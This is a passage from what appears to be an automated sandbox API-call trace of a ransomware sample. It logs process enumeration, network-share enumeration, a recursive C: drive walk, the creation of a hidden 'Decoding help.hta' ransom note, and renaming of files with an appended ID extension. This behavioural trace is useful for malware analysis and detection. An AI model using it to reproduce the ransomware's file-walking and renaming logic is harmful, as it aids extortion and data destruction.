szExeFile="csrss.exe")) returned 1 [0053.617] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0053.622] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0054.079] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0054.083] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0054.087] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.090] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.094] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.097] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.101] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.105] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.343] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.347] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0054.351] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0054.354] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0054.358] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.362] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0054.365] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f0, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="C_932.NLS.exe")) returned 1 [0054.369] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0054.372] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0054.376] CloseHandle (hObject=0x1b8) returned 1 [0054.376] Sleep (dwMilliseconds=0x3e8) [0055.948] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x828 [0056.501] Process32FirstW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0056.504] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0056.507] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0056.511] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0056.515] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0056.518] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0056.522] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0057.424] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0057.428] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0057.431] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0057.435] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.438] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.442] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.445] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.449] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.452] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.455] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.458] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0058.840] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0058.846] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0058.850] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.853] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0058.857] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d5, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="C_932.NLS.exe")) returned 1 [0058.860] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0058.864] Process32NextW (in: hSnapshot=0x828, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0058.868] CloseHandle (hObject=0x828) returned 1 [0058.868] Sleep (dwMilliseconds=0x3e8) [0060.808] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x398 [0063.942] Process32FirstW (in: hSnapshot=0x398, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0063.946] Process32NextW (in: hSnapshot=0x398, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0063.950] Process32NextW (in: hSnapshot=0x398, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0063.953] Process32NextW (in: hSnapshot=0x398, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0063.957] Process32NextW (in: hSnapshot=0x398, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0063.961] Process32NextW (in: hSnapshot=0x398, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0063.964] Process32NextW (hSnapshot=0x398, lppe=0x50fd5c) Thread: id = 3 os_tid = 0x9d0 Thread: id = 4 os_tid = 0x9f0 Thread: id = 5 os_tid = 0x9f4 Thread: id = 7 os_tid = 0xa00 [0037.599] WNetOpenEnumA (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x2acff68 | out: lphEnum=0x2acff68*=0x5a5570) returned 0x0 [0040.037] WNetEnumResourceA (in: hEnum=0x5a5570, lpcCount=0x2acff7c, lpBuffer=0x3440458, lpBufferSize=0x2acff78 | out: lpcCount=0x2acff7c, lpBuffer=0x3440458, lpBufferSize=0x2acff78) returned 0x0 [0040.037] WNetOpenEnumA (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x3440458, lphEnum=0x2acff3c | out: lphEnum=0x2acff3c*=0x5dbf98) returned 0x0 [0040.897] WNetEnumResourceA (in: hEnum=0x5dbf98, lpcCount=0x2acff50, lpBuffer=0x9b09298, lpBufferSize=0x2acff4c | out: lpcCount=0x2acff50, lpBuffer=0x9b09298, lpBufferSize=0x2acff4c) returned 0x103 [0040.897] WNetCloseEnum (hEnum=0x5dbf98) returned 0x0 [0040.898] WNetOpenEnumA (dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x3440478, lphEnum=0x2acff3c) Thread: id = 8 os_tid = 0xa04 [0038.303] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*.*", lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x5a52b0 [0038.303] lstrcmpW (lpString1=".", lpString2="$Recycle.Bin") returned 1 [0038.303] lstrcmpW (lpString1="..", lpString2="$Recycle.Bin") returned 1 [0038.303] lstrcmpiW (lpString1="windows", lpString2="$Recycle.Bin") returned 1 [0038.305] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0038.305] lstrlenW (lpString="\\\\?\\C:\\*.*") returned 10 [0038.305] lstrcatW (in: lpString1="\\\\?\\C:\\", lpString2="$Recycle.Bin" | out: lpString1="\\\\?\\C:\\$Recycle.Bin") returned="\\\\?\\C:\\$Recycle.Bin" [0038.305] lstrcatW (in: lpString1="\\\\?\\C:\\$Recycle.Bin", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\$Recycle.Bin\\*.*") returned="\\\\?\\C:\\$Recycle.Bin\\*.*" [0038.305] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x603e28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.307] CloseHandle (hObject=0x1c4) returned 1 [0038.307] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0038.307] lstrcmpW (lpString1=".", lpString2="Boot") returned -1 [0038.307] lstrcmpW (lpString1="..", lpString2="Boot") returned -1 [0038.307] lstrcmpiW (lpString1="windows", lpString2="Boot") returned 1 [0038.308] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0038.308] lstrlenW (lpString="\\\\?\\C:\\*.*") returned 10 [0038.308] lstrcatW (in: lpString1="\\\\?\\C:\\", lpString2="Boot" | out: lpString1="\\\\?\\C:\\Boot") returned="\\\\?\\C:\\Boot" [0038.308] lstrcatW (in: lpString1="\\\\?\\C:\\Boot", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.308] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x61be90, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.310] CloseHandle (hObject=0x1c4) returned 1 [0038.310] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0038.311] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0038.311] lstrlenW (lpString="\\\\?\\C:\\*.*") returned 10 [0038.311] lstrcatW (in: lpString1="\\\\?\\C:\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Decoding help.hta") returned="\\\\?\\C:\\Decoding help.hta" [0038.311] GetFileAttributesW (lpFileName="\\\\?\\C:\\Decoding help.hta" (normalized: "c:\\decoding help.hta")) returned 0xffffffff [0038.311] CreateFileW (lpFileName="\\\\?\\C:\\Decoding help.hta" (normalized: "c:\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0038.312] WriteFile (in: hFile=0x1c4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2c0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2c0fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0038.313] CloseHandle (hObject=0x1c4) returned 1 [0038.315] SetFileAttributesW (lpFileName="\\\\?\\C:\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0038.315] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr") returned 1 [0038.315] lstrlenW (lpString="bootmgr") returned 7 [0038.315] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0038.315] lstrlenW (lpString="\\\\?\\C:\\*.*") returned 10 [0038.315] lstrcatW (in: lpString1="\\\\?\\C:\\", lpString2="bootmgr" | out: lpString1="\\\\?\\C:\\bootmgr") returned="\\\\?\\C:\\bootmgr" [0038.315] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\bootmgr" | out: lpString1="\\\\?\\C:\\bootmgr") returned="\\\\?\\C:\\bootmgr" [0038.315] lstrcatW (in: lpString1="\\\\?\\C:\\bootmgr", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\bootmgr.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\bootmgr.[ID]g9uZrLhJaygpwRm1[ID]" [0038.315] SetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr", dwFileAttributes=0x80) returned 0 [0038.337] MoveFileW (lpExistingFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), lpNewFileName="\\\\?\\C:\\bootmgr.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\bootmgr.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0038.338] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\bootmgr.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0038.338] MoveFileW (lpExistingFileName="\\\\?\\C:\\bootmgr.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\bootmgr.[id]g9uzrlhjaygpwrm1[id]"), lpNewFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr")) returned 1 [0038.339] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0038.339] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0038.339] lstrlenW (lpString="\\\\?\\C:\\*.*") returned 10 [0038.339] lstrcatW (in: lpString1="\\\\?\\C:\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Decoding help.hta") returned="\\\\?\\C:\\Decoding help.hta" [0038.339] GetFileAttributesW (lpFileName="\\\\?\\C:\\Decoding help.hta" (normalized: "c:\\decoding help.hta")) returned 0x1 [0038.339] lstrcmpiW (lpString1="Decoding help.hta", lpString2="BOOTSECT.BAK") returned 1 [0038.339] lstrlenW (lpString="BOOTSECT.BAK") returned 12 [0038.339] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0038.339] lstrlenW (lpString="\\\\?\\C:\\*.*") returned 10 [0038.339] lstrcatW (in: lpString1="\\\\?\\C:\\", lpString2="BOOTSECT.BAK" | out: lpString1="\\\\?\\C:\\BOOTSECT.BAK") returned="\\\\?\\C:\\BOOTSECT.BAK" [0038.339] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\BOOTSECT.BAK" | out: lpString1="\\\\?\\C:\\BOOTSECT.BAK") returned="\\\\?\\C:\\BOOTSECT.BAK" [0038.339] lstrcatW (in: lpString1="\\\\?\\C:\\BOOTSECT.BAK", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\BOOTSECT.BAK.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\BOOTSECT.BAK.[ID]g9uZrLhJaygpwRm1[ID]" [0038.339] SetFileAttributesW 